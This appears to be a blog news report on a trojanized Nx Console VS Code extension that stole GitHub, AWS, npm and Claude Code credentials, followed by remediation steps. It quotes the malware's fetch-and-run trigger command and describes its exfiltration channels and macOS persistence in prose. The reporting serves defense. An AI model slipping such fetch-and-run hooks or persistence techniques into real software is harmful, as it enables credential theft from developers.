Nx Console VS Code extension logo Nx / nrwl
by VibecodedThis

Poisoned VS Code Extension Breached GitHub and Stole Claude Code Configs

A trojanized Nx Console extension was live on the VS Code Marketplace for 11 minutes on May 18. It stole GitHub tokens, AWS keys, npm credentials, 1Password vaults, and Claude Code configuration files from over 6,000 developer machines.

Share

A trojanized version of the Nx Console VS Code extension hit the Visual Studio Marketplace on May 18, 2026 and sat there for roughly 11 minutes. In that window, it was installed on over 6,000 developer machines. The payload stole GitHub tokens, npm OIDC tokens, AWS credentials, Kubernetes credentials, HashiCorp Vault tokens, 1Password vault items, SSH keys, and Claude Code configuration files.

GitHub confirmed on May 21 that approximately 3,800 of its internal repositories were exfiltrated as a result.

What happened

Nx Console is a VS Code extension published by Nrwl with 2.2 million total installations. It provides a graphical interface for Nx monorepo management. On May 18, threat actor group TeamPCP published a malicious version tagged 18.95.0 to the VS Code Marketplace at 12:36 UTC. The Nx team pulled it at 12:47 UTC.

TeamPCP got in the door through a contributor’s GitHub token, which was itself stolen in an earlier supply chain compromise of TanStack npm packages. They used that token to push an orphan commit to the official nrwl/nx GitHub repository — a commit not reachable from any branch, accessible only if you know its SHA.

The modified extension, which looked and behaved identically to the real one, executed one shell command on workspace open:

npx -y github:nrwl/nx#558b09d7

That fetched the orphan commit and ran its 498 KB obfuscated payload.

What the payload did

The payload ran six credential-harvesting modules targeting:

  • GitHub tokens (patterns: ghp_, gho_, ghs_)
  • npm OIDC tokens
  • AWS credentials (IMDS, ECS metadata, Secrets Manager)
  • HashiCorp Vault tokens
  • Kubernetes credentials
  • 1Password vault items
  • Private SSH keys
  • Claude Code configuration at ~/.claude/settings.json

On Linux, it also attempted privilege escalation via passwordless sudo and read process memory directly from /proc/*/mem to extract in-memory secrets.

Harvested data was encrypted (AES-256-GCM + RSA-OAEP) and exfiltrated through three independent channels: HTTPS to a C2 domain, the GitHub API using the victim’s own tokens, and DNS tunneling as a backup channel.

The payload also installed a persistent macOS backdoor: a Python file at ~/.local/share/kitty/cat.py registered as a LaunchAgent (com.user.kitty-monitor.plist) with hourly execution. The backdoor polled the GitHub Search API for signed commands, verified against an embedded 4096-bit RSA public key.

The most concerning capability beyond credential theft: the payload included full Sigstore integration, letting attackers publish downstream npm packages with valid cryptographic signatures. Any package they chose to push would pass supply chain verification checks.

Who was affected

GitHub is the confirmed victim with 3,800 internal repositories exfiltrated. GitHub said there is no evidence of impact to customer data outside its internal repos, and that it rotated critical secrets after containment.

The TanStack compromise that started this chain also hit OpenAI, Mistral AI, and Grafana Labs, according to StepSecurity’s analysis. Claude Code configuration files were specifically targeted, meaning any developer running both the poisoned extension and Claude Code should treat their Claude API keys and config as compromised.

What to do now

If you had Nx Console installed in VS Code and opened any workspace between 12:36 and 12:47 UTC on May 18, assume your credentials were stolen.

Steps from the Nx team and StepSecurity:

  1. Update Nx Console to v18.100.0 or later
  2. Kill any daemon processes: pkill -f __DAEMONIZED
  3. Remove macOS persistence artifacts: ~/.local/share/kitty/cat.py and ~/Library/LaunchAgents/com.user.kitty-monitor.plist
  4. Check /var/tmp/.gh_update_state (anti-replay file the malware creates)
  5. Rotate every credential accessible from the affected machine: GitHub tokens, npm tokens, AWS access keys, GCP and Azure credentials, GitHub Actions repo and org secrets, Kubernetes credentials, Vault secrets, and any 1Password vault items accessed via CLI
  6. Audit logs in GitHub, 1Password, Vault, AWS CloudTrail, and npm
  7. For machines with high-sensitivity access, reimage rather than remediate

StepSecurity’s advisory puts it plainly: “Any secret reachable from the affected workstation should be treated as compromised, even if it was never written to a file.”

Broader context

This attack used three supply chain hops to reach developers: a TanStack npm compromise leaked a contributor’s GitHub credentials, which enabled a push to the nrwl/nx repository, which enabled the VS Code Marketplace publish. Each hop had legitimate cryptographic signatures along the way.

The 11-minute window is short, but the VS Code Marketplace’s auto-update behavior meant the malicious version reached machines that had auto-updates enabled before the extension was pulled. The initial Nx team estimate of 28 installs turned out to be badly wrong; the revised figure is 6,000 or more.

The direct targeting of ~/.claude/settings.json is a signal that attackers are aware of where AI coding tools store API keys and configuration. Developers using Claude Code, Copilot, Cursor, or any AI tool that writes credentials to disk should treat this as a reason to review where those keys live and what access they carry.

Sources: StepSecurity analysis, The Hacker News, The Hacker News (credential stealer analysis), Bleeping Computer, VentureBeat

Share